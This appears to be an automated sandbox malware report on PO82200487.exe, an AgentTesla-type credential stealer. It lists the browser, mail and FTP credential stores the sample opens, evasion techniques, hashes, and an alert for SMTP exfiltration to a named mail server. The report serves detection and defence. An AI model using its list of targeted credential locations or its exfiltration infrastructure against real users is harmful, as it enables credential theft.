                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeQueries volume information: C:\Users\user\Desktop\PO82200487.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Source: Yara matchFile source: 4.2.PO82200487.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.PO82200487.exe.4339620.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000004.00000002.2567205281.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1350373878.0000000004172000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: dump.pcap, type: PCAP
                  Source: Yara matchFile source: 00000004.00000002.2568941236.000000000321A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.2568941236.00000000031C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: PO82200487.exe PID: 7780, type: MEMORYSTR
                  Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                  Source: C:\Users\user\Desktop\PO82200487.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeFile opened: C:\FTP Navigator\Ftplist.txtJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                  Source: Yara matchFile source: 00000004.00000002.2568941236.00000000031C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: PO82200487.exe PID: 7780, type: MEMORYSTR
                  Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Source: Yara matchFile source: 4.2.PO82200487.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.PO82200487.exe.4339620.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000004.00000002.2567205281.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1350373878.0000000004172000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: dump.pcap, type: PCAP
                  Source: Yara matchFile source: 00000004.00000002.2568941236.000000000321A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.2568941236.00000000031C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: PO82200487.exe PID: 7780, type: MEMORYSTR
                  Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
                  Windows Management Instrumentation
                  1
                  DLL Side-Loading
                  111
                  Process Injection
                  1
                  Masquerading
                  2
                  OS Credential Dumping
                  111
                  Security Software Discovery
                  Remote Services1
                  Email Collection
                  1
                  Encrypted Channel
                  Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                  DLL Side-Loading
                  11
                  Disable or Modify Tools
                  1
                  Credentials in Registry
                  1
                  Process Discovery
                  Remote Desktop Protocol1
                  Archive Collected Data
                  1
                  Non-Standard Port
                  Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)141
                  Virtualization/Sandbox Evasion
                  Security Account Manager141
                  Virtualization/Sandbox Evasion
                  SMB/Windows Admin Shares2
                  Data from Local System
                  1
                  Non-Application Layer Protocol
                  Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook111
                  Process Injection
                  NTDS1
                  Application Window Discovery
                  Distributed Component Object ModelInput Capture11
                  Application Layer Protocol
                  Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
                  Obfuscated Files or Information
                  LSA Secrets1
                  File and Directory Discovery
                  SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts12
                  Software Packing
                  Cached Domain Credentials24
                  System Information Discovery
                  VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                  DLL Side-Loading
                  DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand
                  SourceDetectionScannerLabelLink
                  PO82200487.exe55%ReversingLabsWin32.Trojan.Leonem
                  PO82200487.exe100%Joe Sandbox ML
                  No Antivirus matches
                  No Antivirus matches
                  No Antivirus matches
                  SourceDetectionScannerLabelLink
                  http://www.elderscrolls.com/skyrim/character0%Avira URL Cloudsafe
                  http://www.elderscrolls.com/skyrim/characterT0%Avira URL Cloudsafe
                  http://www.elderscrolls.com/skyrim/player0%Avira URL Cloudsafe
                  NameIPActiveMaliciousAntivirus DetectionReputation
                  mail.mbarieservicesltd.com
                  199.79.62.115
                  truefalse
                    high
                    NameSourceMaliciousAntivirus DetectionReputation
                    http://www.elderscrolls.com/skyrim/characterPO82200487.exefalse
                    • Avira URL Cloud: safe
                    unknown
                    http://www.elderscrolls.com/skyrim/characterTPO82200487.exefalse
                    • Avira URL Cloud: safe
                    unknown
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namePO82200487.exe, 00000000.00000002.1348848708.0000000002C88000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      http://www.elderscrolls.com/skyrim/playerPO82200487.exe, 00000000.00000002.1348848708.000000000293A000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://mail.mbarieservicesltd.comPO82200487.exe, 00000004.00000002.2568941236.000000000321A000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs
                        IPDomainCountryFlagASNASN NameMalicious
                        199.79.62.115
                        mail.mbarieservicesltd.comUnited States
                        394695PUBLIC-DOMAIN-REGISTRYUSfalse
                        Joe Sandbox version:41.0.0 Charoite
                        Analysis ID:1569124
                        Start date and time:2024-12-05 14:01:08 +01:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 5m 12s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of analysed new started processes analysed:11
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:PO82200487.exe
                        Detection:MAL
                        Classification:mal100.troj.spyw.evad.winEXE@7/6@3/1
                        EGA Information:
                        • Successful, ratio: 100%
                        HCA Information:
                        • Successful, ratio: 92%
                        • Number of executed functions: 64
                        • Number of non-executed functions: 13
                        Cookbook Comments:
                        • Found application associated with file extension: .exe
                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                        • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
                        • Not all processes where analyzed, report is missing behavior information
                        • Report size getting too big, too many NtCreateKey calls found.
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • VT rate limit hit for: PO82200487.exe
                        TimeTypeDescription
                        08:02:00API Interceptor59x Sleep call for process: PO82200487.exe modified
                        08:02:02API Interceptor15x Sleep call for process: powershell.exe modified
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        199.79.62.115ORDER#023_2024.exeGet hashmaliciousAgentTeslaBrowse
                          QFEWElNtpn.exeGet hashmaliciousAgentTeslaBrowse
                            SoA_14000048_002.exeGet hashmaliciousAgentTeslaBrowse
                              Quote 000002320.exeGet hashmaliciousAgentTeslaBrowse
                                LPO-2024-357.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                  Quote5000AFC.exeGet hashmaliciousAgentTesla, PureLog Stealer, zgRATBrowse
                                    Quote1000AFC.exeGet hashmaliciousAgentTesla, PureLog Stealer, zgRATBrowse
                                      Quote 40240333-REV2.exeGet hashmaliciousAgentTeslaBrowse
                                        PO ALJAT-5804-2024.exeGet hashmaliciousAgentTeslaBrowse
                                          INQ#84790.exeGet hashmaliciousAgentTeslaBrowse
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            mail.mbarieservicesltd.comORDER#023_2024.exeGet hashmaliciousAgentTeslaBrowse
                                            • 199.79.62.115
                                            QFEWElNtpn.exeGet hashmaliciousAgentTeslaBrowse
                                            • 199.79.62.115
                                            SoA_14000048_002.exeGet hashmaliciousAgentTeslaBrowse
                                            • 199.79.62.115
                                            Quote 000002320.exeGet hashmaliciousAgentTeslaBrowse
                                            • 199.79.62.115
                                            LPO-2024-357.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                            • 199.79.62.115
                                            Quote5000AFC.exeGet hashmaliciousAgentTesla, PureLog Stealer, zgRATBrowse
                                            • 199.79.62.115
                                            Quote1000AFC.exeGet hashmaliciousAgentTesla, PureLog Stealer, zgRATBrowse
                                            • 199.79.62.115
                                            Quote 40240333-REV2.exeGet hashmaliciousAgentTeslaBrowse
                                            • 199.79.62.115
                                            PO ALJAT-5804-2024.exeGet hashmaliciousAgentTeslaBrowse
                                            • 199.79.62.115
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            PUBLIC-DOMAIN-REGISTRYUSORDER#023_2024.exeGet hashmaliciousAgentTeslaBrowse
                                            • 199.79.62.115
                                            QFEWElNtpn.exeGet hashmaliciousAgentTeslaBrowse
                                            • 199.79.62.115
                                            SoA_14000048_002.exeGet hashmaliciousAgentTeslaBrowse
                                            • 199.79.62.115
                                            Quote 000002320.exeGet hashmaliciousAgentTeslaBrowse
                                            • 199.79.62.115
                                            new booking 9086432659087.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                            • 162.251.80.30
                                            rAttached_updat.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                            • 103.76.231.42
                                            LPO-2024-357.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                            • 199.79.62.115
                                            RFQ.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                            • 162.251.80.30
                                            Quote5000AFC.exeGet hashmaliciousAgentTesla, PureLog Stealer, zgRATBrowse
                                            • 199.79.62.115
                                            Quote1000AFC.exeGet hashmaliciousAgentTesla, PureLog Stealer, zgRATBrowse
                                            • 199.79.62.115
                                            No context
                                            No context
                                            Process:C:\Users\user\Desktop\PO82200487.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):1216
                                            Entropy (8bit):5.34331486778365
                                            Encrypted:false
                                            SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                            MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                            SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                            SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                            SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                            Malicious:true
                                            Reputation:high, very likely benign file
                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):2232
                                            Entropy (8bit):5.380192968514367
                                            Encrypted:false
                                            SSDEEP:48:+WSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMuge//8PUyus:+LHyIFKL3IZ2KRH9Oug8s
                                            MD5:2E16D2F2BF61526793175AF057C80E38
                                            SHA1:C646E8FE846DE9B54BF04679A5A9F5216DD5C7B9
                                            SHA-256:BA86B69C37F37E218D33B2643466FD3C5D2551C0215ABC36883C7A2D75C9848C
                                            SHA-512:3E95DF7756044BB4CAFE391CB8860B551621923B795B80FE6753DD5B1D11B9DCB5F41938B65761D6D7EE5689471A0AA7CE3EAF38A03A50399FA29704294AD34E
                                            Malicious:false
                                            Reputation:moderate, very likely benign file
                                            Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Reputation:high, very likely benign file
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                            Entropy (8bit):7.666077073376279
                                            TrID:
                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                            • Win32 Executable (generic) a (10002005/4) 49.75%
                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                            • Windows Screen Saver (13104/52) 0.07%
                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                            File name:PO82200487.exe
                                            File size:707'584 bytes
                                            MD5:9af88888e3c54e3a62bc409ea5de349e
                                            SHA1:6ba1ed216e4b1003d7bf0445b8a0bde4d7dc4694
                                            SHA256:2abceffc33aa61d03182eeed898d402dcbfb1ddca4d1e6ee4b0b0482aa4f3b8a
                                            SHA512:b1e236d3fa6f0fe62df9feff646d7d6803aaf61923c3e3afcf1175801c03ea7da53ebc7821300137b5141ae5ee2dc63d15be1abaa5b05b0ad25f33f9eef93768
                                            SSDEEP:12288:L2TpWXt5SikpewQZmIAtBZ60K3rlx1Puzi25T/dns593Tsmni1AObnpu/D5EChK3:LtSSwQXAtBZ606Ppki2xnU
                                            TLSH:C3E4C09C3640F44EC443CE358EA4FD74A9646DAA5307D3039ADB6EEFF91E8568E041E2
                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Qg..............0.................. ........@.. ....................... ............@................................
                                            Icon Hash:0697f0b9b0b1d827
                                            Entrypoint:0x4aca1e
                                            Entrypoint Section:.text
                                            Digitally signed:false
                                            Imagebase:0x400000
                                            Subsystem:windows gui
                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                            Time Stamp:0x67511A97 [Thu Dec 5 03:14:31 2024 UTC]
                                            TLS Callbacks:
                                            CLR (.Net) Version:
                                            OS Version Major:4
                                            OS Version Minor:0
                                            File Version Major:4
                                            File Version Minor:0
                                            Subsystem Version Major:4
                                            Subsystem Version Minor:0
                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                            Instruction
                                            jmp dword ptr [00402000h]
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            NameVirtual AddressVirtual Size Is in Section
                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IMPORT0xac9c40x57.text
                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xae0000x1bb0.rsrc
                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0xb00000xc.reloc
                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                            .text0x20000xaaa240xaac008b554a36f5f2502e552d50c5f982ec91False0.868725979136164data7.671418587267901IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                            .rsrc0xae0000x1bb00x1c0034b42d8da9432316e34ba66c8ce7f417False0.8684430803571429data7.378443986540976IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            .reloc0xb00000xc0x200484533dc58756a46b9e1764a112ba7b9False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                            RT_ICON0xae0e80x174ePNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9639624539054643
                                            RT_GROUP_ICON0xaf8380x14data1.05
                                            RT_VERSION0xaf84c0x360data0.4236111111111111
                                            DLLImport
                                            mscoree.dll_CorExeMain
                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                            2024-12-05T14:02:10.944038+01002855245ETPRO MALWARE Agent Tesla Exfil via SMTP1192.168.2.949721199.79.62.115587TCP
